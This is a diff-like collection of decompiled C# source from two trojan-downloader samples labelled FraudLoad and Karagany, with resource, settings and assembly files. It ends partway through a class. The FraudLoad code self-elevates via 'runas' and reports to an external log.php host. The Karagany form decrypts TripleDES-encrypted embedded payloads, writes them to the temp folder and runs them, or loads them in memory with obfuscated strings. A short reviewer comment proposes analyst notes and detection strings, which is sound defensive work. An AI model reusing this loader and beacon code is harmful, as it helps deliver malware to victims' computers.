<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,116 @@
// Decompiled with JetBrains decompiler
// Type: mute.Program
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Web;
using System.Windows.Forms;
namespace mute
{
internal static class Program
{
[DllImport("kernel32")]
private static extern int SetUnhandledExceptionFilter(Program.CallBack cb);
public static int newexceptionfilter(ref long a) => 1;
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode);
public static bool IsAdministrator()
{
WindowsIdentity current = WindowsIdentity.GetCurrent();
return null != current && new WindowsPrincipal(current).IsInRole(WindowsBuiltInRole.Administrator);
}
[STAThread]
private static void Main()
{
if (Path.GetDirectoryName(Application.ExecutablePath) != Application.UserAppDataPath && !Program.IsAdministrator())
{
Process.Start(new ProcessStartInfo()
{
FileName = Application.ExecutablePath,
Verb = "runas"
});
}
else
{
Thread.Sleep(5000);
bool createdNew;
Mutex mutex = new Mutex(true, Application.ProductName, out createdNew);
if (!createdNew)
return;
System.IO.File.WriteAllText(Path.Combine(Application.UserAppDataPath, "hide.txt"), "empty");
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
try
{
Application.Run((Form) new Form1());
}
catch (Exception ex1)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) ex1.Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex2)
{
int num = (int) MessageBox.Show(str);
}
}
finally
{
mutex.ReleaseMutex();
}
}
}
private static void ThreadHandler(object sender, ThreadExceptionEventArgs args)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) args.Exception.Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex)
{
int num = (int) MessageBox.Show(str);
}
Application.Exit();
}
private static void MyHandler(object sender, UnhandledExceptionEventArgs args)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) ((Exception) args.ExceptionObject).Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex)
{
int num = (int) MessageBox.Show(str);
}
Application.Exit();
}
public delegate int CallBack(ref long a);
}
}
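Review bot: This file has no analyst annotation, so anyone triaging the FraudLoad sample has to rediscover the host artefacts in `Main` from the code: it re-launches itself with `Verb = "runas"` when it is neither running from `Application.UserAppDataPath` nor elevated, writes a `hide.txt` marker there, and enforces a single instance with a mutex named after `Application.ProductName`. I would add a header comment above the class such as `// Analyst note: self-elevates via runas, drops hide.txt in UserAppDataPath, reports exceptions over plain HTTP to /log.php with fixed user=4.` The same report-then-`MessageBox` block is repeated in `Main`, `ThreadHandler` and `MyHandler`, and nothing visible in this file registers the two handlers or calls `SetUnhandledExceptionFilter` or `TerminateProcess`. That may be dead code or decompiler residue, so the comment should say they appear unused rather than list them as active behaviour. For detection, the hard-coded `user=4`/memo pair and the `Unhandled Exception Raised:` prefix in the `msg` parameter are stable strings to key on.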
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: mute.Properties.Resources
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace mute.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (mute.Properties.Resources.resourceMan == null)
mute.Properties.Resources.resourceMan = new ResourceManager("mute.Properties.Resources", typeof (mute.Properties.Resources).Assembly);
return mute.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => mute.Properties.Resources.resourceCulture;
set => mute.Properties.Resources.resourceCulture = value;
}
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,38 @@
// Decompiled with JetBrains decompiler
// Type: mute.Properties.Settings
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace mute.Properties
{
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default
{
get
{
Settings defaultInstance = Settings.defaultInstance;
return defaultInstance;
}
}
[DebuggerNonUserCode]
[DefaultSettingValue("False")]
[UserScopedSetting]
public bool Hide
{
get => (bool) this[nameof (Hide)];
set => this[nameof (Hide)] = (object) value;
}
}
}
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Internet Process")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCompany("Internet Process")]
[assembly: AssemblyCopyright("Copyright © Internet Process 2012")]
[assembly: AssemblyDescription("Internet Process")]
[assembly: AssemblyFileVersion("3.7.2.8")]
[assembly: Guid("e8c7ff49-833c-4200-a678-2f919282a9d8")]
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("Internet Process")]
[assembly: AssemblyVersion("3.7.2.8")]
@@ -0,0 +1,816 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.Form1
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using SOUCHEIE.My;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace SOUCHEIE
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("Button2")]
private Button _Button2;
[AccessedThroughProperty("Button3")]
private Button _Button3;
[AccessedThroughProperty("CheckBox1")]
private CheckBox _CheckBox1;
[AccessedThroughProperty("CheckBox2")]
private CheckBox _CheckBox2;
[AccessedThroughProperty("Label1")]
private Label _Label1;
[AccessedThroughProperty("GroupBox1")]
private GroupBox _GroupBox1;
[AccessedThroughProperty("Label2")]
private Label _Label2;
[AccessedThroughProperty("ComboBox1")]
private ComboBox _ComboBox1;
public string ndnmrvXfvEtRnGWDjtjqaPE;
public string[] pimiUBLAhwQUpDuiKLgNvgG;
public object DUNVHvMpaSimcJtvTLJrTQe;
public Form1()
{
this.Load += new EventHandler(this.dFepogsdawimFWXXLYGtuln);
this.ndnmrvXfvEtRnGWDjtjqaPE = Application.ExecutablePath;
this.pimiUBLAhwQUpDuiKLgNvgG = Strings.Split(Encoding.Default.GetString(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(254)) + "K{p" + Conversions.ToString(Strings.Chr(149)) + Conversions.ToString(Strings.Chr(156)) + Conversions.ToString(Strings.Chr(212)) + Conversions.ToString(Strings.Chr(183)) + "S" + Conversions.ToString(Strings.Chr(171)) + "^" + Conversions.ToString(Strings.Chr(149)) + Conversions.ToString(Strings.Chr(165)) + Conversions.ToString(Strings.Chr(136)) + "W")))), this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(206)) + "x"));
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.Button1 = new Button();
this.Button2 = new Button();
this.Button3 = new Button();
this.CheckBox1 = new CheckBox();
this.CheckBox2 = new CheckBox();
this.Label1 = new Label();
this.GroupBox1 = new GroupBox();
this.Label2 = new Label();
this.ComboBox1 = new ComboBox();
this.SuspendLayout();
Button button1_1 = this.Button1;
Point point1 = new Point(62, 36);
Point point2 = point1;
button1_1.Location = point2;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
Size size1 = new Size(75, 23);
Size size2 = size1;
button1_2.Size = size2;
this.Button1.TabIndex = 0;
this.Button1.Text = "Button1";
this.Button1.UseVisualStyleBackColor = true;
Button button2_1 = this.Button2;
point1 = new Point(205, 224);
Point point3 = point1;
button2_1.Location = point3;
this.Button2.Name = "Button2";
Button button2_2 = this.Button2;
size1 = new Size(75, 23);
Size size3 = size1;
button2_2.Size = size3;
this.Button2.TabIndex = 1;
this.Button2.Text = "Button2";
this.Button2.UseVisualStyleBackColor = true;
Button button3_1 = this.Button3;
point1 = new Point(28, 224);
Point point4 = point1;
button3_1.Location = point4;
this.Button3.Name = "Button3";
Button button3_2 = this.Button3;
size1 = new Size(75, 23);
Size size4 = size1;
button3_2.Size = size4;
this.Button3.TabIndex = 2;
this.Button3.Text = "Button3";
this.Button3.UseVisualStyleBackColor = true;
this.CheckBox1.AutoSize = true;
CheckBox checkBox1_1 = this.CheckBox1;
point1 = new Point(99, 94);
Point point5 = point1;
checkBox1_1.Location = point5;
this.CheckBox1.Name = "CheckBox1";
CheckBox checkBox1_2 = this.CheckBox1;
size1 = new Size(81, 17);
Size size5 = size1;
checkBox1_2.Size = size5;
this.CheckBox1.TabIndex = 3;
this.CheckBox1.Text = "CheckBox1";
this.CheckBox1.UseVisualStyleBackColor = true;
this.CheckBox2.AutoSize = true;
CheckBox checkBox2_1 = this.CheckBox2;
point1 = new Point(22, 165);
Point point6 = point1;
checkBox2_1.Location = point6;
this.CheckBox2.Name = "CheckBox2";
CheckBox checkBox2_2 = this.CheckBox2;
size1 = new Size(81, 17);
Size size6 = size1;
checkBox2_2.Size = size6;
this.CheckBox2.TabIndex = 4;
this.CheckBox2.Text = "CheckBox2";
this.CheckBox2.UseVisualStyleBackColor = true;
this.Label1.AutoSize = true;
Label label1_1 = this.Label1;
point1 = new Point(155, 150);
Point point7 = point1;
label1_1.Location = point7;
this.Label1.Name = "Label1";
Label label1_2 = this.Label1;
size1 = new Size(39, 13);
Size size7 = size1;
label1_2.Size = size7;
this.Label1.TabIndex = 5;
this.Label1.Text = "Label1";
GroupBox groupBox1_1 = this.GroupBox1;
point1 = new Point(62, 82);
Point point8 = point1;
groupBox1_1.Location = point8;
this.GroupBox1.Name = "GroupBox1";
GroupBox groupBox1_2 = this.GroupBox1;
size1 = new Size(200, 100);
Size size8 = size1;
groupBox1_2.Size = size8;
this.GroupBox1.TabIndex = 6;
this.GroupBox1.TabStop = false;
this.GroupBox1.Text = "GroupBox1";
this.Label2.AutoSize = true;
Label label2_1 = this.Label2;
point1 = new Point(177, 29);
Point point9 = point1;
label2_1.Location = point9;
this.Label2.Name = "Label2";
Label label2_2 = this.Label2;
size1 = new Size(39, 13);
Size size9 = size1;
label2_2.Size = size9;
this.Label2.TabIndex = 7;
this.Label2.Text = "Label2";
this.ComboBox1.FormattingEnabled = true;
ComboBox comboBox1_1 = this.ComboBox1;
point1 = new Point(12, 94);
Point point10 = point1;
comboBox1_1.Location = point10;
this.ComboBox1.Name = "ComboBox1";
ComboBox comboBox1_2 = this.ComboBox1;
size1 = new Size(121, 21);
Size size10 = size1;
comboBox1_2.Size = size10;
this.ComboBox1.TabIndex = 8;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(292, 273);
this.ClientSize = size1;
this.Controls.Add((Control) this.ComboBox1);
this.Controls.Add((Control) this.Label2);
this.Controls.Add((Control) this.GroupBox1);
this.Controls.Add((Control) this.Label1);
this.Controls.Add((Control) this.CheckBox2);
this.Controls.Add((Control) this.CheckBox1);
this.Controls.Add((Control) this.Button3);
this.Controls.Add((Control) this.Button2);
this.Controls.Add((Control) this.Button1);
this.Name = "KING";
this.Text = nameof (Form1);
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual Button Button1
{
get => this._Button1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Button1 = value;
}
internal virtual Button Button2
{
get => this._Button2;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Button2 = value;
}
internal virtual Button Button3
{
get => this._Button3;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Button3 = value;
}
internal virtual CheckBox CheckBox1
{
get => this._CheckBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox1 = value;
}
internal virtual CheckBox CheckBox2
{
get => this._CheckBox2;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox2 = value;
}
internal virtual Label Label1
{
get => this._Label1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value;
}
internal virtual GroupBox GroupBox1
{
get => this._GroupBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._GroupBox1 = value;
}
internal virtual Label Label2
{
get => this._Label2;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Label2 = value;
}
internal virtual ComboBox ComboBox1
{
get => this._ComboBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._ComboBox1 = value;
}
private void dFepogsdawimFWXXLYGtuln(object sender, EventArgs e)
{
try
{
if (Conversions.ToDouble(this.pimiUBLAhwQUpDuiKLgNvgG[14]) != 0.0)
Thread.Sleep(Conversions.ToInteger(this.pimiUBLAhwQUpDuiKLgNvgG[14]));
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[6], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.AbWjJrcashsrUglvWLpPUBT(this.pimiUBLAhwQUpDuiKLgNvgG[7], this.pimiUBLAhwQUpDuiKLgNvgG[8]);
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[10], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.RXXeGpqoUgCmIipoOOesgoC();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[11], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.cvGqHnmUkvCkHFuKRHnFvee();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[9], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.bJwQqmrhNCUHsooEXOHZEXb();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[12], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.JifTRmpsoLwDgKYvqYDjDUn();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[13], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.GcgXojEaFPbweNAQSKGPfDl();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[15], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
{
int num = (int) Interaction.MsgBox((object) this.pimiUBLAhwQUpDuiKLgNvgG[18], (MsgBoxStyle) Conversions.ToInteger(this.pimiUBLAhwQUpDuiKLgNvgG[16]), (object) this.pimiUBLAhwQUpDuiKLgNvgG[17]);
}
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[19], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
{
File.WriteAllBytes((Path.GetTempPath() + this.pimiUBLAhwQUpDuiKLgNvgG[22]).Replace("\0", ""), this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[20])), this.pimiUBLAhwQUpDuiKLgNvgG[21]));
Process.Start((Path.GetTempPath() + this.pimiUBLAhwQUpDuiKLgNvgG[22]).Replace("\0", ""));
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[4], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(131))), false) == 0)
{
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[5], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(196)) + "f}"), false) != 0)
{
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[5], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(240)) + "kfa" + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(157)) + Conversions.ToString(Strings.Chr(211)) + Conversions.ToString(Strings.Chr(144)) + "_" + Conversions.ToString(Strings.Chr(156)) + "v" + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(188)) + Conversions.ToString(Strings.Chr(180)) + "E"), false) == 0)
this.DUNVHvMpaSimcJtvTLJrTQe = (object) new object[2]
{
(object) this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[0])), this.pimiUBLAhwQUpDuiKLgNvgG[1]),
(object) this.ndnmrvXfvEtRnGWDjtjqaPE
};
}
else
this.DUNVHvMpaSimcJtvTLJrTQe = (object) new object[2]
{
(object) this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[0])), this.pimiUBLAhwQUpDuiKLgNvgG[1]),
(object) (Environment.GetEnvironmentVariable(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(197)) + "mpu" + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(158)))) + this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(238)) + "Iwr" + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(131)) + Conversions.ToString(Strings.Chr(245)) + Conversions.ToString(Strings.Chr(176)) + "V" + Conversions.ToString(Strings.Chr(135)) + "<" + Conversions.ToString(Strings.Chr(169)) + Conversions.ToString(Strings.Chr(151)) + Conversions.ToString(Strings.Chr(181)) + "\u007F5" + Conversions.ToString(Strings.Chr(231)) + Conversions.ToString(Strings.Chr(145)) + "u" + Conversions.ToString(Strings.Chr(192)) + Conversions.ToString(Strings.Chr(190)) + Conversions.ToString(Strings.Chr(147)) + Conversions.ToString(Strings.Chr(138)) + "," + Conversions.ToString(Strings.Chr(231)) + Conversions.ToString(Strings.Chr(238)) + Conversions.ToString(Strings.Chr(168)) + Conversions.ToString(Strings.Chr(250)) + "o" + Conversions.ToString(Strings.Chr(154)) + "v" + Conversions.ToString(Strings.Chr(146)) + Conversions.ToString(Strings.Chr(227)) + Conversions.ToString(Strings.Chr(207)) + "\a" + Conversions.ToString(Strings.Chr(175)) + "\aj" + Conversions.ToString(Strings.Chr(196)) + Conversions.ToString(Strings.Chr(130)) + "\u00150D"))
};
Assembly.Load(this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[2])), this.pimiUBLAhwQUpDuiKLgNvgG[3])).GetType(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(251)) + "\\")).InvokeMember(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(243)) + "E"), BindingFlags.InvokeMethod, (Binder) null, (object) null, (object[]) this.DUNVHvMpaSimcJtvTLJrTQe);
}
else
{
this.DUNVHvMpaSimcJtvTLJrTQe = (object) new object[6]
{
(object) this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[0])), this.pimiUBLAhwQUpDuiKLgNvgG[1]),
(object) true,
(object) this.pimiUBLAhwQUpDuiKLgNvgG[5],
(object) this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(156)) + "aft"),
(object) true,
(object) false
};
Assembly.Load(this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[2])), this.pimiUBLAhwQUpDuiKLgNvgG[3])).GetType(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(224)) + "qpA" + Conversions.ToString(Strings.Chr(138)))).InvokeMember(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(251)) + "jtt" + Conversions.ToString(Strings.Chr(172)) + Conversions.ToString(Strings.Chr(152)) + Conversions.ToString(Strings.Chr(214)) + Conversions.ToString(Strings.Chr(154))), BindingFlags.InvokeMethod, (Binder) null, (object) null, (object[]) this.DUNVHvMpaSimcJtvTLJrTQe);
}
this.Close();
}
public object dbQKEPUPjMdFsNdGcXTgwED(string OpYLktpcQZZGtbw, string KLRMgiGGRsnFwXQ)
{
TripleDESCryptoServiceProvider cryptoServiceProvider1 = new TripleDESCryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
cryptoServiceProvider1.Key = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(KLRMgiGGRsnFwXQ));
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(OpYLktpcQZZGtbw);
return (object) Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
public byte[] nqvAWtbiCPaaiamiNLPivRs(byte[] WDHGaiBwEtINXLU, string qrSdGIwGSUsCahp)
{
TripleDESCryptoServiceProvider cryptoServiceProvider1 = new TripleDESCryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
cryptoServiceProvider1.Key = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(qrSdGIwGSUsCahp));
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = WDHGaiBwEtINXLU;
return decryptor.TransformFinalBlock(inputBuffer, 0, checked (inputBuffer.Length - 1));
}
